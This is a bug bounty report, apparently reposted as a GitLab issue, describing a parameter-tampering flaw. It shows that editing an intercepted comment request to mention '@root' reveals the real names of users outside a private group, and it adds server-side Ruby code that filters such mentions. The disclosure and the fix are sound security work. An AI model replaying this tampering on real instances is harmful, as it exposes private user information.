Mentioning Anyone in Comments at Private User Group Epic

HackerOne report #494726 by mehmet on 2019-02-12, assigned to estrike:

1 - Create a regular user. Let's say it's @pentest01
2 - Go to http://your-gitlab-instance/dashboard/groups and create a private user group. Don't add anyone.
3 - Go to that user group and add one epic.
4 - At the bottom of the page there is a comment area where you can also mention users, but only users in your group.
5 - Create one comment and in that comment mention yourself.
6 - Intercept the request.

POST /groups/xxxx/-/epics/1/notes HTTP/1.1  
Host: 12.0.0.236  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-CSRF-Token: [REDACTED]=  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Referer: http://12.0.0.236/groups/xxxx/-/epics/1  
Content-Length: 112  
Cookie:[REDACTED]e  
Connection: close

note%5Bnoteable_type%5D=epic&note%5Bnoteable_id%5D=1&note%5Bnote%5D=%40root&merge_request_diff_head_sha=undefined  

7 - In the note[note] parameter you should see %40pentest01. Change it to %40root, which means that we are mentioning a default user who is NOT a member of our private user group.

8 - Go back to your epic and validate that the @root user is successfully mentioned in your comment.
9 - Move your mouse over that mention; the auto-popup will show the name of that user as well.

Impact

With a known GitLab username, attackers can expose the real name of users who are not members of the private group.
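The root cause in the steps above is that the mention restriction lives only in the client-side autocomplete, while the note body posted to the notes endpoint is attacker controlled. The following is an added illustration (not GitLab's own code) of the server-side check that closes the gap: for a private group, only members are resolved into linked mentions with a display name, and any other @username is left as inert text. The User and Group stand-ins, the MENTION_RE pattern and the sample directory are assumptions constructed for this example.

```ruby
# Added example, not GitLab code: server-side filtering of @mentions in a
# note posted to an epic of a private group. The autocomplete only offers
# members, but the note body can be edited in the request, so the
# membership check has to happen on the server before rendering.
require 'set'
require 'cgi'

# Minimal stand-in models (assumed shapes, not GitLab's models).
User  = Struct.new(:username, :name)
Group = Struct.new(:path, :visibility, :member_usernames) do
  def private?
    visibility == :private
  end

  def member?(user)
    member_usernames.include?(user.username)
  end
end

# Matches "@username" but not the "@host" part of an e-mail address.
MENTION_RE = /(?<![\w.])@(?<username>[a-zA-Z0-9_][a-zA-Z0-9_.-]*)/

# Usernames the note may legitimately reference. Unknown usernames are
# dropped; for a private group, non-members are dropped as well.
def allowed_mentions(note_body, group, user_directory)
  note_body.scan(MENTION_RE).flatten.uniq.select do |username|
    user = user_directory[username]
    next false unless user
    group.private? ? group.member?(user) : true
  end
end

# Renders the note for display. Permitted mentions become links carrying
# the display name; anything else stays plain text, so the hover popup
# can never reveal the real name of a non-member.
def render_note(note_body, group, user_directory)
  allowed = allowed_mentions(note_body, group, user_directory).to_set
  note_body.gsub(MENTION_RE) do
    username = Regexp.last_match[:username]
    if allowed.include?(username)
      name = CGI.escapeHTML(user_directory[username].name)
      %(<a class="mention" title="#{name}">@#{username}</a>)
    else
      "@#{username}"
    end
  end
end

# Constructed sample data mirroring the report: pentest01 is the only member.
DIRECTORY = {
  'pentest01' => User.new('pentest01', 'Pen Tester'),
  'root'      => User.new('root', 'Administrator')
}.freeze
PRIVATE_GROUP = Group.new('xxxx', :private, Set['pentest01'])
```

With this check in place the tampered request from step 7 still stores the text "@root", but the rendered comment neither links it nor exposes the user's name.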


Edited Jul 06, 2022 by Costel Maxim